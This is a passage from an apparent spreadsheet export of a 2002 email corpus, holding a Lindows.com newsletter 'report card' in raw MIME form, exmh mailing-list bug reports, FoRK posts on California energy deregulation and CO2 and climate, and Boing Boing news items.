business. Click-N-Run   is the easiest way to load software onto a computer. For the first time a Linux based system has leapt ahead of Microsoft's operating systems in ease of use. With 1,000 plus programs already in the Click-N-Run Warehouse  , users can find quality software titles for just about any computing task and, with a single mouse-click download, install and run these programs. All these titles are included in the $99. This is a fantastic consumer experience and price point. Look for a lot more great software in the Warehouse in the future. Grade: A-   _____   Microsoft Windows Compatibility: We live in a Microsoft world, so there needs to be a bridge from the legacy world to the broadband LindowsOS world. This means we need to support some bridge programs, file types and network devices to help people interact with the legacy Microsoft world. LindowsOS computers come with software to view, print and copy popular Microsoft applications like: MS Word files, MS PowerPoint files and MS Excel documents. There's great Linux based alternatives and we'll guide people to those alternatives (they're better than most people realize). To edit Microsoft files, we'd highly recommend one of the office suites in our Warehouse such as OpenOffice  .  Many of these programs are of very high-quality and a great value since they're included in the Warehouse  . Sometimes there are no viable alternatives for those programs, so we're investing necessary resources to support some Microsoft Windows based programs. Stay tuned for more developments in this area. Our printer support is ok, but there's lots of room for more drivers. Connecting to MS Windows based file servers is still a challenge. We need to get better in the above areas.  Grade: B    _____   Communication: We've tried to be diligent in communicating where our company is going which is why there's typically a weekly Michael's Minute  . While our overall goal has not deviated - Bringing Choice To Your Computer - our implementation has become more focused as we listened to what our Insiders and potential customers have told us. (Keep sending me your comments.) We have been de-emphasizing running Microsoft Windows programs because many of you told us you detest spending hundreds of dollars on individual software programs, forced upgrades and activation codes. It's not just the operating system, but costly Microsoft programs you're wanting to avoid.  Consequently, we've been emphasizing Click-N-Run because it will change the way you think about software. Having a neatly categorized library   of 1,000+ software titles all for a flat annual fee at your digital fingertips is an entirely new way to think about paying for software. It's immediate, elegant and affordable. There are lots of mischaracterizations about Lindows.com swirling around - which happens when you have a small organization which can't address every question or publication. We'll do a better job of addressing these in the future. For now, I wrote up answers to the Top Myths about Lindows.com. Check them out by visiting: [URL]www.lindows.com[/URL]  Grade: B+   _____   Overall: B+ Michael Robertson Please visit support.lindows.com   to answer questions you may have about LindowsOS or Lindows.com. Bringing Choice to Your Computer!    LindowsOS is presently available on LindowsOS Certified Computers being offered from Lindows.com   Builder partners.  The General Release of LindowsOS (available now for download and preview to Lindows.com   Insider partners) will be made available later this year for those wishing to install and run LindowsOS on their existing computer hardware.  The General Release version will support a wider range of computer hardware and includes unique features such as a "Friendly-Install" alongside an existing MicrosoftR Windows operating system, a streamlined installation process which requires no computer knowledge, and the ability to run a select set of "bridge" Windows-compatible programs. For more information see   [URL]www.lindows.com[/URL]  LindowsOS and Lindows.com are trademarks of Lindows.com, Inc. LinuxR is a registered trademark of Linus Torvalds. MicrosoftR WindowsR operating system is a registered trademark or service mark of the Microsoft Corporation. mm18 ___________________________________________________________ To change your mailing list options please go to [URL]www.lindows.com[/URL] ------=_LINDOWS_1890362a5620f32f969ae58b8fe2ef84 Content-Type: text/html; 	charset="us-ascii" Content-Transfer-Encoding: quoted-printable Message Â  Â  Â  Â Â Â If this=20 message is not displaying properly, click=20 here to launch it in your browser. Michaelâ€™s = Minute:=20             Lindows.com Report Card  As summer arrives, = many school=20             children are coming home with their report cards.Â  I = thought=20             this would be a good time to see what kind of grades = Lindows.com=20             received for their first 9 months in = operation.. Â To view=20             the Timeline of Lindows.com's first 9 months in business, click here. = Operating System: Â  As = of last week,=20             consumers can experience LindowsOS in one of two ways. One = way is to=20             buy a computer running LindowsOS from Walmart.com, for = as little=20             as $299. This is a significant milestone for us, as we've = partnered=20             with our first builder (Microtel) and retailer (Walmart). = These=20             computers work great out of the box and are ideal for = general=20             purpose computing tasks.  For = those who=20             already have a computer and also wish to try LindowsOS, we = offer the=20             Insider = program. This=20             gives people wanting early access to LindowsOS a chance to = try out=20             LindowsOS as it develops. Currently, Insiders report = installation=20             success about 80%Â  of the time on their PCs. Therefore = we have=20             some room to grow, consequently, this product is not yet for =             everyone.  Some = may wonder=20             how we can sell a computer at Walmart when the = program=20             available directly from Lindows.com is billed as not = completely=20             ready. The difference is the Walmart = computers are=20             certified, ensuring that all componentsÂ  work elegantly = with=20             LindowsOS. That's much different than offering a software = program=20             that will work on any computer in the world - = that's very=20             difficult. It's the difference between making a single = pair of=20             shoes for a known foot size versus opening a shoe store with = every=20             style of shoe for every size foot. The first one is easy, = the second=20             one is a much bigger job. While the=20             installer is fantastically easy and fast (the entire OS = installs in=20             under 5 minutes), we've got a lot more work to do to support = a wider=20             range of hardware, printers and other devices. Grade:Â =20             B Software:=20              Our = goal to give=20             people choice means giving them choice not just on their = operating=20             system, but access to all the programs they'll want to add = to their=20             computer to really make it work for them in their school, = home or=20             business. Click-N-Run is = the=20             easiest way to load software onto a computer. For the first = time a=20             Linux based system has leapt ahead of Microsoft's operating = systems=20             in ease of use. With 1,000 plus programs already in the Click-N-Run = Warehouse,=20             users can find quality software titles for just about any = computing=20             task and, with a single mouse-click download, install and = run these=20             programs. All these titles are included in the $99. This is = a=20             fantastic consumer experience and price point. Look for a=20             lotÂ more great software in the Warehouse in the = future.Â =20             Grade:=20             A- Microsoft=20             Windows Compatibility: We = live in a=20             Microsoft world, so there needs to be a bridge from the = legacy world=20             to the broadband LindowsOS world. This means we need to = support some=20             bridge programs, file types and network devices to help = people=20             interact with the legacy Microsoft world. LindowsOS = computers come=20             with software to view, print and copy popular Microsoft = applications=20             like: MS Word files, MS PowerPoint files and MS Excel = documents.=20             There's great Linux based alternatives and we'll guide = people to=20             those alternatives (they're better than most people = realize). To=20             edit Microsoft files, we'd highly recommend one of the = office suites=20             in our Warehouse such as Op= enOffice.=20              Many = of these=20             programs are of very high-quality and a great value since = they're=20             included in the Warehouse. = Sometimes=20             there are no viable alternatives for those programs, so = we're=20             investing necessary resources to support some Microsoft = Windows=20             based programs. Stay tuned for more developments in this = area. Our=20             printer support is ok, but there's lots of room for more = drivers.=20             Connecting to MS Windows based file servers is still a = challenge. We=20             need to get better in the above areas. Â Grade: = B=20              Communication: We've tried to=20             be diligent in communicating where our company is going = which is why=20             there's typically a weekly Michael's Minute. = While our=20             overall goal has not deviated - Bringing Choice To Your = Computer -=20             our implementation has become more focused as we listened to = what=20             our Insiders and potential customers have told us. (Keep = sending me=20             your comments.) We have been de-emphasizing running = Microsoft=20             Windows programs because many of you told us you detest = spending=20             hundreds of dollars on individual software programs, forced = upgrades=20             and activation codes. It's not just the operating system, = but costly=20             Microsoft programs you're wanting to avoid.  Consequently,=20             we've been emphasizing Click-N-Run because it will change = the way=20             you think about software. Having a neatly categorized = library of=20             1,000+ software = titles all for=20             a flat annual fee at your digital fingertips is an entirely = new way=20             to think about paying for software. It's immediate, elegant = and=20             affordable.  There are lots=20             of mischaracterizations about Lindows.com swirling around - = which=20             happens when you have a small organization which can't = address every=20             question or publication. We'll do a better job of addressing = these=20             in the future. For now, I wrote up answers to the Top Myths = about=20             Lindows.com. Check them out by visiting: [URL]www.lindows.com[/URL]Â =20             Grade:=20             B+ Overall:=20             B+ Michael Robertson Please visit support.lindows.com = to answer=20             questions you may have about LindowsOS or = Lindows.com. Bringing Choice to Your Computer! = Â  LindowsOS is=20             presently available on LindowsOS Certified Computers being = offered=20             from Lindows.com Builder partners.Â  = The General=20             Release of LindowsOS (available now for download and preview = to=20             Lindows.com Insider partners) will be = made=20             available later this year for those wishing to install and = run=20             LindowsOS on their existing computer hardware.Â  The = General=20             Release version will support a wider range of computer = hardware and=20             includes unique features such as a = â€œFriendly-Installâ€ alongside an=20             existing MicrosoftÂ® Windows operating system, a = streamlined=20             installation process which requires no computer knowledge, = and the=20             ability to run a select set of "bridge" Windows-compatible = programs.=20             For more information see [URL]www.lindows.com[/URL]Â  LindowsOS and Lindows.com are trademarks = of=20             Lindows.com, Inc. LinuxÂ® is a registered trademark of = Linus=20             Torvalds. MicrosoftÂ® WindowsÂ® operating system is a = registered=20             trademark or service mark of the Microsoft = Corporation. mm18 __________________________________________________________= _To change your mailing list options please go to [URL]www.lindows.com[/URL]&lt;= /P&gt; ------=_LINDOWS_1890362a5620f32f969ae58b8fe2ef84--</t>
  </si>
  <si>
    <t>www.lindows.com www.lindows.com www.lindows.com www.lindows.com www.lindows.com www.lindows.com</t>
  </si>
  <si>
    <t>To: exmh-workers@spamassassin.taint.org\nFrom: Anders Eriksson &lt;aeriksson@fastmail.fm&gt;\nDate: Wed, 25 Sep 2002 23:22:26 +0200</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 23:22:26 +0200</t>
  </si>
  <si>
    <t>Bug report: msg n+1 marked read</t>
  </si>
  <si>
    <t>It seems that something changed during the last 3-4 weeks.\n\n1) In a folder, msgs 1-n is read, n=current, n upwards is unread.\n2) change to another folder\n3) change back to the original folder and you'll see msg n+1 being \nhighlighted as current for a split second, that it changes back to \nn=current.\n\nKind of annoying since it marks msg n+1 as read.\n\n/Anders\n\n\n\n_______________________________________________\nExmh-workers mailing list\nExmh-workers@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Chris Garrigues &lt;cwg-dated-1030982822.b8ff65@DeepEddy.Com&gt;\nFrom: Anders Eriksson &lt;aeriksson@fastmail.fm&gt;\nDate: Wed, 25 Sep 2002 23:09:39 +0200</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 23:09:39 +0200</t>
  </si>
  <si>
    <t>Chris Garrigues &lt;cwg-dated-1030982822.b8ff65@DeepEddy.Com&gt;</t>
  </si>
  <si>
    <t>cwg-dated-1033065967.2dc492@DeepEddy.Com said: &gt; From:  Chris Garrigues  &gt; Date:  Wed, 28 Aug 2002 11:07:01 -0500 &gt; &gt; Here's a fix that I think will make a real difference. &gt;  &gt; Ftoc_ShowSequences needs to be able to be called with an optional &gt; list of msgids  &gt; to update and if it's called that way it only removes or adds tags &gt; for those  &gt; messages.  Then in places like MsgChange, we only update the &gt; messages which have &gt; changed. &gt;  &gt; Also, a separate Ftoc_ShowSequence function which only updates the &gt; display of  &gt; one sequence should be written which also takes an optional list of &gt; msgids. &gt;    &gt; In a place like MsgChange, it would only need to update the cur &gt; sequence. &gt;  &gt; If nobody else gets to it, I'll do this when I get back. &gt; I just checked this in.  Let me know if it helps. &gt; Chris  Congratulations Chris, you just made the hall of fame!! Speed is much better now. I haven't done any tests, but I'd say that latency dropped 2-3 times and we're back in good shape again. Well done! /Anders _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Bill Humphries &lt;bill@whump.com&gt;\nDate: Wed, 25 Sep 2002 16:22:40 -0700</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 16:22:40 -0700</t>
  </si>
  <si>
    <t>Bill Humphries &lt;bill@whump.com&gt;</t>
  </si>
  <si>
    <t>"Free" Elvis Costello CD a trojan horse for DRM malware</t>
  </si>
  <si>
    <t>A friend in Dublin is mailing me the CD which was in the UK Sunday  Times. I've just been advised that running it in a Win32 machine is  dangerous as all get out. [URL]http://www.theregister.co.uk[/URL] -- whump ---- Bill Humphries  [URL]http://www.whump.com[/URL]</t>
  </si>
  <si>
    <t>http://www.theregister.co.uk http://www.whump.com</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nDate: Wed, 25 Sep 2002 15:39:40 -0400</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 15:39:40 -0400</t>
  </si>
  <si>
    <t>California needs intelligent energy deregulation</t>
  </si>
  <si>
    <t>--- begin forwarded text Date: Wed, 25 Sep 2002 13:57:15 -0400 To: Digital Bearer Settlement List  From: "R. A. Hettinga"  Subject: California needs intelligent energy deregulation Sender:  [URL]http://www.siliconvalley.com[/URL] Posted on Tue, Sep. 24, 2002 Dan Gillmor: State needs intelligent energy deregulation By Dan Gillmor Mercury News Technology Columnist The facts were trade and government secrets at the time. But the energy industry failed the smell test in 2000 and 2001 as it tried to justify soaring wholesale electricity and natural-gas prices in California. Now, as investigators and regulators unravel the reasons for a financial and fiscal mess we'll be cleaning up for decades, we're learning what everyone suspected. Market games helped engineer the price spikes. The latest manipulation was highlighted in Monday's finding by a federal administrative law judge, who said a dominant natural-gas company squeezed supplies in order to squeeze customers. His ruling came a few days after California's Public Utilities Commission reported that electricity generators mysteriously failed to use available capacity during the crunch, also driving up prices. And don't forget the sleazy games by energy traders who gleefully worked the system, in schemes best summed up by an Enron insider's boast in a memorandum made public in May, that ``Enron gets paid for moving energy to relieve congestion without actually moving any energy or relieving any congestion.'' How much of this was illegal, as opposed to simply amoral, remains to be seen. Unfortunately, California's response -- confusion, lawsuits and policy tweaks -- hasn't been sufficient. More unfortunately, even if the state suddenly did all the right things -- including a hard-nosed program designed to free ourselves from the gougers' grips -- we would need a willing federal partner. But it's foolish to think that the Bush administration would do much to help one of its least favorite states, or do anything that conflicts with its love of traditional, non-renewable energy sources. If the lawsuits against various energy companies and traders bear any fruit, the best we can expect is to pay off some of the massive debts the state amassed to prevent a total collapse in early 2001. That's a reasonable approach, but don't expect miracles. State policies are moving the wrong way on utility regulation, meanwhile. Instead of relentlessly pursuing smart deregulation -- still a good idea if it gives customers genuine choices -- state laws and regulations ``put the utilities back in the business of buying energy for captive customers,'' notes V. John White, executive director of the Sacramento-based Center for Energy Efficiency and Renewable Technologies ([URL]www.ceert.org[/URL] It's tempting to call for an outright state takeover of the utilities -- tempting but a bad idea. When there's genuine competition, as we could achieve in electricity generation, the private sector tends to do a better job. Instead of abandoning deregulation, California should find a way to inject real competition into the market. We do need to recognize that the current system of delivering electricity defies privatization, at least under current conditions. Smart regulation is essential. But the best response to gouging is to use less of what the gougers control. There are two ways: conservation and replacement. We need more of both. The best recent step is a new state law that slowly but surely ratchets up the use of electricity from renewables. By 2017, California's utilities will have to get 20 percent of their power from solar and other renewable sources. Several power companies are expected to do this even sooner. But this law has an element of old-line thinking, the captive-customer model we need to be getting away from, not sustaining. Lip service to newer ideas isn't enough. The state should be removing barriers to micro-generation systems, small generators that can run on a variety of fuels and provide decentralized, harder-to-disrupt electricity to homes and businesses. This technology is coming along fast. State policies are not keeping pace. Investing to save energy is increasingly the smartest move of all. California should be doing more to encourage this, whether through tax incentives or outright grants in low-income households. California hasn't done badly on conservation in a general sense, and energy customers did react to last year's soaring rates and blackouts by cutting back, but it's lunacy to wait for the next crisis when we can do something to avoid it altogether. Maybe this is all pointless. The Bush administration's energy policies, so grossly tilted toward the unholy trinity of oil, coal and nuclear, are making us all more vulnerable. Never mind what might happen if the coming war in Iraq goes badly. It's pointless to hope for a sane federal policy -- a crash program to drastically speed the inevitable transition to a hydrogen-based energy system. But the largest state, one of the world's major economies in its own right, does have some clout. We can hit the rip-off artists where it hurts, and protect ourselves from even more serious disruptions. Maybe next year.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www.siliconvalley.com www.ceert.org</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Whit Blauvelt &lt;whit@transpect.com&gt;\nDate: Wed, 25 Sep 2002 12:57:13 -0400</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 12:57:13 -0400</t>
  </si>
  <si>
    <t>Whit Blauvelt &lt;whit@transpect.com&gt;</t>
  </si>
  <si>
    <t>[Razor-users] "No razor servers available at this time"</t>
  </si>
  <si>
    <t>I'm getting "no servers available" about half the time in the last few days.\nThis is with Razor 2. Is there something I need adjust in the installation\nhere, or are the servers just down/overloaded?\n\nThanks,\nWhit\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "Jim Whitehead" &lt;ejw@cse.ucsc.edu&gt;\nDate: Wed, 25 Sep 2002 10:56:41 -0700</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 10:56:41 -0700</t>
  </si>
  <si>
    <t>RE: CO2 and climate (was RE: Goodbye Global Warming)</t>
  </si>
  <si>
    <t>OK, let's bring some data into the discussion: [URL]http://www.grida.no[/URL] (A graph, derived from Vostok ice core samples, of CO2 and temperature fluctuations over the past 400k years). &gt; Recent high-resolution studies of historical CO2 concentrations and &gt; temperatures over hundreds of thousands of years have shown a modest &gt; correlation between the two. In a number of cases, CO2 level increases &gt; are not in phase with temperature increases and actually trail the &gt; increase in temperature by a short time i.e. increases in temperature &gt; preceded increases in CO2 concentrations. The more studies that are done &gt; of the geological record, the more it seems that CO2 concentrations are &gt; correlated with temperature increases, but are not significantly &gt; causative. Based on the Vostok data, you are right, there is a very strong correlation between temperature and CO2 concentrations, but it doesn't always appear to be causal. &gt; With respect to absolute CO2 concentrations, it is also important to &gt; point out that our best data to date suggests that they follow a fairly &gt; regular cycle with a period of about 100,000 years. Also correct -- the peak of each cycle is at about 290-300 ppm CO2. &gt; As it &gt; happens, current CO2 concentrations are within 10% of other previous &gt; cyclical concentration peaks for which we have good data. Not correct. Mauna Loa data  and  show that the current CO2 concentrations are at 370ppm, 18% *greater* than the *highest* recorded value from the past 400k years. Furthermore, CO2 concentrations are growing at 15ppm every 10 years, much faster than any recorded increase in the Vostok data (though perhaps the Vostok data isn't capable of such fine resolution). &gt; In other words, we may be adding to the CO2 levels, No, we are *definitely* adding to CO2 levels. Look at the following chart: [URL]http://www.grida.no[/URL] (Shows CO2 concentrations since 1870, the "historical record"). Not only is the CO2 increase over 130 years unprecedented in the Vostok record, it is clear that the rate of change is *increasing*, not decreasing. There is no other compelling explanation for this increase, except for anthropogenic input. You're really out on the fringe if you're debating this -- even global warming skeptics generally concede this point. &gt; but it looks a lot like we &gt; would be building a molehill on top of a mountain in the historical &gt; record.  At the very least, there is nothing anomalous about current CO2 &gt; concentrations. Wrong again. Current CO2 levels are currently unprecedented over the past 400k years, unless there is some mechanism that allows CO2 levels to quickly spike, and then return back to "normal" background levels (and hence the spike might not show up in the ice cores). Still, by around 2075-2100 we will have reached 500 ppm CO2, a level that even you would have a hard time arguing away. &gt; Also, CO2 levels interact with the biosphere in a manner that ultimately &gt; affects temperature.  Again, the interaction is not entirely &gt; predictable, but this is believed to be one of the regulating negative &gt; feedback systems mentioned above. Yes, clouds and oceans are a big unknown. Still, we know ocean water has a finite capacity to store CO2, and if the world temperature doesn't increase, but we all have Seattle-like weather all the time, the effects would be enormous. &gt; Last, as greenhouse gases go, CO2 isn't particularly potent, although it &gt; makes up for it in volume in some cases.  Gases such as water and &gt; methane have a far greater impact as greenhouse gases on a per molecule &gt; basis.  Water vapor may actually be the key greenhouse gas, something &gt; that CO2 only indirectly effects through its interaction with the &gt; biosphere. Correct. Data on relative contributions of greenhouse gasses: [URL]http://www.grida.no[/URL] Note that methane concentrations now are *much* higher than pre-industrial levels (many cows farting, and rice paddies outgassing), and methane is also a contributor in the formation of atmospheric water vapor. Another clearly anthropogenic increase in a greenhouse gas. I'm in favor of reductions in methane levels as well. Data on water vapor here: [URL]http://www.agu.org[/URL] &gt; CO2 was an easy mark for early environmentalism, but all the recent &gt; studies and data I've seen gives me the impression that it is largely a &gt; passenger on the climate ride rather than the driver. I tend to think that holistic, and techical approaches would work best in reducing global warming. I favor an energy policy that has a mix of solar, wind and nuclear, with all carbon-based combustion using renewable sources of C-H bonds. Aggressive pursuit of carbon sink strategies also makes sense (burying trees deep underground, for example). Approaches that involve reductions in lifestyle to a "sustainable" level are unrealistic -- Americans just won't do it (you'd be surprised at the number of climate change researchers driving SUVs). But, as California showed during last year's energy crisis, shifts in patterns of consumption are possible, and improved efficiency is an easy sell. - Jim</t>
  </si>
  <si>
    <t>http://www.grida.no http://www.grida.no http://www.grida.no http://www.agu.org</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 25 Sep 2002 08:03:46 -0000</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 08:03:46 -0000</t>
  </si>
  <si>
    <t>boingboing &lt;rssfeeds@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>yyyy@spamassassin.taint.org</t>
  </si>
  <si>
    <t>P2P slogans for EFF</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nEFF is looking for a few good slogans! We're getting some banners made up to \nplace on P2P network clients, with slogans like, "P2P Has a Posse." We need \nmore. Mail your suggestions to kevin@eff.org or post to the discuss link. Link\n[1] Discuss[2]\n\n[1] mailto:kevin@eff.org\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 25 Sep 2002 08:03:45 -0000</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 08:03:45 -0000</t>
  </si>
  <si>
    <t>Get your own genome, feed your hypochondria</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nFor UK#400,000, a bioresearcher will map your personal genome for you. As \ngeneticists discover more markers for congenital diseases, you can compare them \nto your genome and learn what you're in for in your lifetime -- heart disease, \ncancer, baldness, compulsive hand-washing... Link[1] Discuss[2] (_Thanks, Alan!\n_)\n\n[1] [URL]http://timesofindia.indiatimes.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://timesofindia.indiatimes.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>Von Neumann's Best Friend, a bio-pet</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\n[IMG: [URL]http://www.craphound.com[/URL]] Matt "Warchalking" Jones has \ncome up with a bio-dog for the latest Viridian Design Contest[1], called Von \nNeumann's Best Friend. Link[2] Discuss[3] (_Thanks, Matt[4]!_) \n\n\n[1] [URL]http://www.viridiandesign.org[/URL]\n[2] [URL]http://www.blackbeltjones.com[/URL]\n[3] [URL]http://www.quicktopic.com[/URL]\n[4] [URL]http://www.blackbeltjones.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.craphound.com http://www.viridiandesign.org http://www.blackbeltjones.com http://www.quicktopic.com http://www.blackbeltjones.com</t>
  </si>
  <si>
    <t>DVD capture: Unbreaking the Mac</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nDVD Capture is an AppleScript for OS X that captures screen-grabs from DVDs. OS \nX normally disables screen-capture while the DVD player is running (even if it \nisn't visible!). I have some home movies on DVD that I'd love to get stills \nfrom, but I can't -- the DVD licensing board has forced Apple to break my \nhardware in such a way as to prevent me from doing something completely lawful, \nto make sure that I never, ever grab a frame out of _Police Academy n - 1_. \nNice to see that independent software authors are willing to un-break my gear \nfor me. Link[1] Discuss[2] (_Thanks, Patrick[3]!_)\n\n[1] [URL]http://www.versiontracker.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.patandkat.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.versiontracker.com http://www.quicktopic.com http://www.patandkat.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 25 Sep 2002 08:03:44 -0000</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 08:03:44 -0000</t>
  </si>
  <si>
    <t>Energy gamers screwed California economy</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nStefan sez: \n\n    A federal judge has determined that gas pipline manager El Paso did indeed \n    limit natural gas supplies to California, resulting in ruinous prices, \n    rolling blackouts, and smug Cato Institute flaks wagging their fingers at \n    hot-tubbers and environmentalists. \n\n    California was sitting on a juicy dotcom-era tax windfall before it all got \n    sucked away by this phony crisis. \n\n    If I were Gov. Davis, I'd sieze every private pipeline, powerline, and \n    power plant and hold them hostage until the energy industry pays back every \n    dime they extorted from the state.  \n\nLink[1] Discuss[2] (_Thanks, Stefan[3]!_)\n\n[1] [URL]http://www.nytimes.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.io.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.nytimes.com http://www.quicktopic.com http://www.io.com</t>
  </si>
  <si>
    <t>Fake News Headlines: Basque Explosion Chases Ends In</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nNewZoid generates fake news-headlines: \n\n    1- Miss Universe Calling For Isidore \n    2- Rumsfeld Suggests Aspirin Reduces Alzheimer's Risk \n    3- Editorial Attacks Computer System \n    4- Stressed Out? Just Call For New TV Show \n    5- Gore To Hear About It \n    6- Nurses To Be Given Their Own Passports On Iraq Action \n    7- US Arraigned In Fighting Slavery \n    8- Lisa Riley Lines Below Chaos Above  \n\nLink[1] Discuss[2] (_Thanks, Daniel[3]!_)\n\n[1] [URL]http://www.newzoid.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.newzoid.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.newzoid.com http://www.quicktopic.com http://www.newzoid.com</t>
  </si>
  <si>
    <t>Flying cars here, jetpacks next?</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nMoller, a public company in Davis, California, has developed a flying car.  \n\n    [IMG: [URL]http://www.craphound.com[/URL]] Moller International \n    has developed the first and only feasible, personally affordable, personal \n    vertical takeoff and landing (VTOL) vehicle the world has ever seen. \n\n    You've always known it was just a matter of time before the world demanded \n    some kind of flying machine which would replace the automobile. Of course, \n    this machine would have to be capable of VTOL, be easy to maintain, cost \n    effective and reliable. Well, we at Moller International believe we have \n    come up with the solution. That solution is the volantor named M400 Skycar. \n     \n\nLink[1] Discuss[2] (_Thanks, Mark!_)\n\n[1] [URL]http://www.moller.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.craphound.com http://www.moller.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 25 Sep 2002 08:03:43 -0000</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 08:03:43 -0000</t>
  </si>
  <si>
    <t>Horror writers against illiteracy</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nThe Horror Writers of America are hosting a charity auction on eBay to raise \nmoney for American literacy charities. \n\n    Among the items up for auction: a rare softcover advance copy (bound \n    galley) of Thomas Harris' The Silence of the Lambs issued by St. Martin's \n    Press in 1988; the first U.S. hardcover edition of Clive Barker's The \n    Damnation Game; and a bundle of limited-edition prints depicting scenes \n    from Stephen King novels such as Carrie and The Shining.  \n\nLink[1] Discuss[2]\n\n[1] [URL]http://www.wired.com[/URL],1284,55319,00.html\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.wired.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>Roman chariots responsible for Space Shuttle design constraints</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nBen Hammersley posts a parable about design specifications, showing the link \nbetween Roman Chariots and the Space Shuttle. It has the ring of something \napocraphyl to me, but it's a good read, nevertheless. \n\n    The U.S. standard railroad gauge (distance between the rails) is 4 feet, \n    8.5 inches. That is an exceedingly odd number. Why was that gauge used? \n    Because that's the way they built them in England, and the U.S. railroads \n    were built by English expatriates. \n\n    Why did the English build them that way? Because the first rail lines were \n    built by the same people who built the pre-railroad tramways, and that's \n    the gauge they used. \n\n    Why did "they" use that gauge? Because the people who built the tramways \n    used the same jigs and tools that they used for building wagons, which used \n    that wheel spacing. \n\n    So why did the wagons have that particular odd spacing? Well, if they tried \n    to use any other spacing, the wagon wheels would break on some of the old, \n    long distance roads in England, because that was the spacing of the wheel \n    ruts... \n\nSnopes says it's false[1], but from their notes, it appears that it's actually \nlargely true, albeit subject to interpretation. Link[2] Discuss[3]\n\n[1] [URL]http://www.snopes.com[/URL]\n[2] [URL]http://www.benhammersley.com[/URL]\n[3] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.snopes.com http://www.benhammersley.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>Britain puts records execs in charge of copyright enforcement</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nThe British government has invited the local equivalent of the RIAA to fund an \n"anti-piracy" post. As Charlie puts it, "Mr Fox, here's the new set of \nhen-house keys you ordered." \n\n    The UK music industry is to co-fund a new post at the Department for \n    Culture, Media and Sport (DCMS) to act as a link with the government in the \n    struggle with music piracy.  \n\nLink[1] Discuss[2] (_via Charlie's Diary[3]_) \n\n[1] [URL]http://news.bbc.co.uk[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.antipope.org[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://news.bbc.co.uk http://www.quicktopic.com http://www.antipope.org</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 25 Sep 2002 08:03:42 -0000</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 08:03:42 -0000</t>
  </si>
  <si>
    <t>Buy the Enron "E"</t>
  </si>
  <si>
